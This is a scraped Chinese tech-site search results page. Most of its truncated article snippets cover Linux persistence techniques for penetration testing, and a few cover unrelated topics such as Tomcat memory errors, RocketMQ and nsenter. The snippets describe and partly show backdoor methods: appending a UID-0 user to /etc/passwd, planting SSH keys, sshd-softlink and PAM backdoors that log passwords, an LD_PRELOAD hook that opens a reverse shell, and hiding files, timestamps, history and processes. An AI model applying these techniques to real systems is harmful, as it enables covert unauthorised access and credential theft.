首页
学习
活动
专区
工具
TVP
发布
您找到你想要的搜索结果了吗?
是的
没有找到

Linux权限维持入门学习

更新时间:2022年12月06日11:43:20 目的 本文主要是学习linux下的权限维持的方法,本文因为写的时间很久了,文章有点乱。...本文仅对linux的权限维持做了非常微小的学习,文中会从攻和防的角度,在借助学习其它文章的前提下进行学习。 文章所有的操作都是网上已有的技术,仅供参考,如有错误,欢迎指正。 1....cat etc/pam.d/su image.png 1.PAM认证机制,若sshd服务中开启PAM认证机制(默认开启),当程序执行时,PAM模块则会搜寻PAM相关设定文件,设定文件一般是在/etc...h%m%s'`.log -s 2048 su' # source下.bashrc文件 source /root/.bashrc 注意文件不要放在其他的高权限文件夹下,否则生成文件的时候会提示权限不足...3.总结 本文仅对linux的权限维持做了非常微小的学习,文章所有的操作都是网上已有的技术,仅供参考,如有错误,欢迎指正。 4.参考资料 其中还有一部分参考的文章链接在文中。

28760

权限维持Linux后门

因此需要进行权限维持,隐藏后门。本文将对Linux下常见的权限维持后门技术进行解析,知己知彼百战不殆。...echo "backdoor:AALvujjdsfdsf:0:0:me:/root:/bin/bash">>/etc/passwd #Aalv…为第一行命令执行结果 2.设置suid权限位 原理:设置suid...(不通操作系统文件不同) 4.写入SSH公钥 原理:Linux主机打开了SSH时默认也开启密钥登陆,故写入ssh公钥,即可留下一条控制系统的路 ssh-keygen -t rsa #生成ssh密钥对...则会修改目录下root文件,也相当于crontab -e 还有许多其它执行计划任务的文件及相关文件 11.预加载动态链接库 原理:系统执行一些命令的时候,在真正执行其文件之前,会加载相应的动态链接库,但linux...提供一个可以加载自定义动态链接库的方式,并且比加载正常动态链接库更早,故可以利用此特点设置自定义加载恶意动态链接库。

1.9K20

渗透测试基础- - -linux权限维持应急

0x03 隐藏权限 0x04 隐藏历史操作命令 技巧一:只针对你的工作关闭历史记录 技巧二:从历史记录中删除指定的命令 0x05 进程隐藏 第一种方法:libprocesshider 0x01 隐藏文件 Linux...下创建一个隐藏文件:touch .test.txt touch 命令可以创建一个文件,文件名前面加一个 点 就代表是隐藏文件 一般的Linux下的隐藏目录使用命令ls -l是查看不出来的,只能查看到文件及文件夹...,查看Linux下的隐藏文件需要用到命令:ls -al 这里,我们可以看到在/tmp下,默认存在多个隐藏目录,这些目录是恶意文件常用来藏身的地方。....Test-unix/、/temp/.X11-unix/、/temp/.XIM-unix/ 0x02 隐藏文件时间戳 Unix 下藏后门必须要修改时间,否则很容易被发现,直接利用 touch 就可以。...比如参考 1.php 的时间,再赋给 2.php,结果两个文件的时间就一样。 利用方法 touch -r 1.php 2.php 或者直接将时间戳修改成某年某月某日。

1.1K20

干货 | Linux下权限维持实战

有趣的 LD_PRELOAD 前言 LD_PRELOAD 是 Linux 系统中的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库...LD_PRELOAD LD_PRELOAD 是 Linux 系统中的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。...: image-20210917151915074 此时我们便成功劫持原程序 passcheck 中的 strcmp 函数。...利用这种思路,我们可以制作一个隐藏得 Linux 后门,比如当管理员执行 ls 命令时会反弹一个 Shell: •hook_strncmp.c #include#include<stdio.h...这样,我们就不用局限于仅劫持某一函数,而应考虑劫持动态链接库,也可以说是劫持一个新进程。

1.4K30

Linux权限维持|内网渗透学习(十二)

Linux权限维持|内网渗透学习(十二) 都是一些偷袭留后门的小技巧, 有哪些内容的话看目录吧 SSH 后门 软链接sshd 输入任意密码就可以root用户权限登陆﹐如果root用户被禁止登陆时﹐可以利用其他存在的用户身份登陆...这个子进程没有什么检验, 而是直接执行系统默认的位置的/usr/sbin/sshd, 这样子控制权又回到脚本, 此时子进程标准输入输出已被重定向到套接字getpeername能真的获取到客户端的TCP...在输入密码的时候, 不论正确错误都会被记录到log文件中, 从而获取管理员的更多账号密码 ssh隐身登录 查看登录状态和记录 w 记录着当前打开的连接的状态 who 记录着当前有哪些用户登录在线的...target_ip /bin/bash -i ssh -o UserKnownHostsFile=/dev/null -T root@target_ip 通过上面两种命令方式登录是不会被记录的从而实现隐身登录 Linux...我们只要nc连接端口即可获得shell 开启一个体验更好的虚拟终端: python -c "import pty;pty.spawn('/bin/bash')" PROMPT_COMMAND 后门 Linux

86432

【权限维持Linux下的几种隐藏技术

0x00 前言 攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和后门文件,本文介绍Linux下的几种隐藏技术。...一般的Linux下的隐藏目录使用命令ls -l是查看不出来的,只能查看到文件及文件夹,查看Linux下的隐藏文件需要用到命令:ls -al 这里,我们可以看到在/tmp下,默认存在多个隐藏目录,这些目录是恶意文件常用来藏身的地方...这个工具在Linux,UNIX类,MS-Windows等操作系统下都可以工作。...第二种方法:进程注入工具linux-inject linux-inject是用于将共享对象注入Linux进程的工具 github项目地址: https://github.com/gaffe23/linux-inject.git...# 下载程序编译git clone https://github.com/gaffe23/linux-inject.gitcd linux-inject && make# 测试进程.

2.8K20

一个 Linux 权限维持小 tip | Linux 后门系列

简介 前一段时间,朋友问了一个这样的问题:Linux 普通权限,没有crontab 之类的,如何做权限维持。...我之前介绍过好多好多种 Linux 权限维持的方法,大多数还是基于 root 权限的,如果不提权的话,有些手法还是受限的,比如 motd,服务之类的。...,等待一段时间就会出现 虽然此时可以 ctrl + c 来中断,但是这样也就直接将后门暴漏给被攻击者,所以我们之前介绍去的方法中都是通过 python fork() 来解决的 说到底,我们就是希望,...我们的程序和登录本身并行执行,那我们新创建一个进程就好了,于是有下面常规的操作 常规的操作 使用 python3 的 fork import os,socket,subprocess; ret =...配置好监听,重新登录试试 可以看到这个也可以成功反弹 shell,那么如果我们不配置监听,看看登录会不会卡住 可以看到,登录没有卡住,和正常登录没有区别 其实呢,这也是我埋在 alias后门 | Linux

76830

linux内存不足导致tomcat宕机

大家好,又见面,我是你们的朋友全栈君。...因为服务器的内存是2g的,所以就怀疑是内存不够了,所导致 开始排查 ps -ef|grep tomcat 显示tomcat已经不在运行了 free -m 查看内存,当时那台机器free,只有77,...这张图是后在自己电脑上截的 grep "Out of memory" /var/log/messages 查看系统日志,显示内存不足,杀死了一个java进程,可以推测,就是tomcat惨遭毒手,...这是由于Linux 内核有个机制叫OOM killer(Out Of Memory killer),,当系统内存不足的时候,out_of_memory()被触发,然后调用select_bad_process...linux选择”bad”进程是通过调用oom_badness(),挑选的算法和想法都很简单很朴实:最bad的那个进程就是那个最占用内存的进程。 ​

3K10

分享一个Linux权限维持神器!!

工具介绍 通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者...] 查看下面的表格可以知道生成的权限维持文件可以运行的python版本,但是这个项目本身是python3运行的[我自己的环境是Python 3.9.7] 权限的划分 快速使用 python3运行此项目...[我自己的环境是Python 3.9.7],但是运行权限维持模块脚本请看上面的表格 安装依赖 pip install -r requirements.txt 快速判断目标机器适合的权限维持模块,运行...python main.py -c 1 查看权限维持模详细块信息 python main.py -c 2 使用此项目生成权限维持脚本[在这之前,请先运行check.py脚本判断出目标机器适合什么类型权限维持的脚本...video/BV1fV411N7Qc/ 常见后门介绍 OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用 发现程度:|| PAM后门,PAM是一个Linux

24640

Kali Linux渗透基础知识整理(四):维持访问

*本文原创作者:sysorem 维持访问 在获得了目标系统的访问权之后,攻击者需要进一步维持这一访问权限。使用木马程序、后门程序和rootkit来达到这一目的。...维持访问是一种艺术形式,思想比渗透更加重要。...Cryptcat用法基本和NC相近,不过多介绍。 ?...weevely weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于...当然那些在下面挺我的小伙伴 我也非常感谢大家Y(^_^)Y有个好消息就是这是最后一篇,我也不会再写也懒得再写这种东西,说真的一个月前熬夜写这个也是一脸蒙蔽—+二脸蒙球的 某云现在不能愉快的玩耍

2.4K80

从用户不足2000万到27亿,这项技术真要上天

导读:6月18日,Facebook位于瑞士的子公司Libra Network(天秤座网络)联合全球26家企业,万众瞩目之下发布其数字货币项目Libra的白皮书。Libra计划在2020年正式上线。...本书主要面向程序员,书中详细介绍加密货币的原理、使用方法,以及如何开发与之相关的软件。对希望理解比特币及加密货币内在工作机制的非程序员读者们,本书前几章还深入介绍比特币概念及其原理。 2 ? ?...本书耗时2年,作者深入研究中国、美国、日本、韩国、新加坡、泰国等十几个国家的区块链监管政策,并对这些国家的几十家区块链企业进行了深入调研,科学而翔实。 4 ? ?

36830

弥补延时消息的不足,RocketMQ 基于时间轮算法实现定时消息!

1.3 存在不足 延时消息存在着一些不足: 1.延时级别只有 18 个,并不能满足所有场景; 2.如果通过修改 messageDelayLevel 配置来自定义延时级别,并不灵活,比如一个在大规模的平台上...2 定时消息 为了弥补延时消息的不足,RocketMQ 5.0 引入了定时消息。 2.1 时间轮算法 为了解决定时任务队列遍历任务导致的性能开销,RocketMQ 定时消息引入了秒级的时间轮算法。...2.2 使用方式 基于时间轮算法的思想,RocketMQ 实现精准的定时消息。...RocketMQ 使用 TimerWheel 来描述时间轮,TimerWheel 中每一个时间节点是一个 Slot,Slot 保存这个延时时间的 TimerLog 信息。...而 RocketMQ 新版本引入了定时消息,弥补了延时消息的不足

1.2K30

Linux技巧1】nsenter命令解决容器内部命令不足的问题

1.1 nsenter介绍 1.1.1 命令介绍 在docker中,为了尽可能缩减镜像大小,常常不会包含一些常用的工具,类似ping,curl,tcpdump等,虽然精简镜像,但如果我们需要在容器内部测试网络联通性时...它位于util-linux包中。...如果指定file,则进入file的命令空间 -u, --uts[=file]:进入uts命令空间。如果指定file,则进入file的命令空间 -i, --ipc[=file]:进入ipc命令空间。...如果指定file,则进入file的命令空间 -n, --net[=file]:进入net命令空间。如果指定file,则进入file的命令空间 -p, --pid[=file]:进入pid命令空间。...如果指定file,则进入file的命令空间 -U, --user[=file]:进入user命令空间。

1.9K00
领券